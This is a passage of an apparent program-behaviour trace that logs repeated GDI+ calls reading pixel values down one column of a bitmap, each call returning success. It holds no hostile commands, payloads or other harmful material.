GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.310] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.310] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=108, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=109, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=110, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=111, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=112, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=113, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.311] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.311] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=114, color=0x18e3d0) returned 0x0 [0274.311] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=115, color=0x18e3d0) returned 0x0 [0274.312] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=116, color=0x18e3d0) returned 0x0 [0274.312] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=117, color=0x18e3d0) returned 0x0 [0274.312] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=118, color=0x18e3d0) returned 0x0 [0274.312] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=119, color=0x18e3d0) returned 0x0 [0274.312] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.312] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.312] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=120, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=121, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=122, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=123, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=124, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=125, color=0x18e3d0) returned 0x0 [0274.313] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.313] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.313] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=126, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=127, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=128, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=129, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=130, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=131, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.314] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=132, color=0x18e3d0) returned 0x0 [0274.314] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.314] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.315] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=133, color=0x18e3d0) returned 0x0 [0274.315] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.315] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.315] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=134, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=135, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=136, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=137, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=138, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=139, color=0x18e3d0) returned 0x0 [0274.316] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.316] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.316] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=140, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=141, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=142, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=143, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=144, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=145, color=0x18e3d0) returned 0x0 [0274.317] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.317] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.317] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=146, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=147, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=148, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=149, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=150, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=151, color=0x18e3d0) returned 0x0 [0274.318] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.318] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.318] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=152, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=153, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=154, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=155, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=156, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=157, color=0x18e3d0) returned 0x0 [0274.319] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.319] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.319] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=158, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=159, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=160, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=161, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=162, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=163, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.320] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.320] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=164, color=0x18e3d0) returned 0x0 [0274.320] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=165, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=166, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=167, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=168, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=169, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.321] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.321] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=170, color=0x18e3d0) returned 0x0 [0274.321] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=171, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=172, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=173, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=174, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=175, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.322] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=176, color=0x18e3d0) returned 0x0 [0274.322] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.322] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=177, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=178, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=179, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=180, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=181, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=182, color=0x18e3d0) returned 0x0 [0274.323] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.323] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.323] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=183, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=184, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=185, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=186, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=187, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=188, color=0x18e3d0) returned 0x0 [0274.324] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.324] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.324] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=189, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=190, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=191, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=192, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=193, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=194, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.325] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.325] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=195, color=0x18e3d0) returned 0x0 [0274.325] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=196, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=197, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=198, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=199, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=200, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.326] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.326] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=201, color=0x18e3d0) returned 0x0 [0274.326] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=202, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=203, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=204, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=205, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=206, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.327] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.327] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=207, color=0x18e3d0) returned 0x0 [0274.327] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=208, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=209, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=210, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight 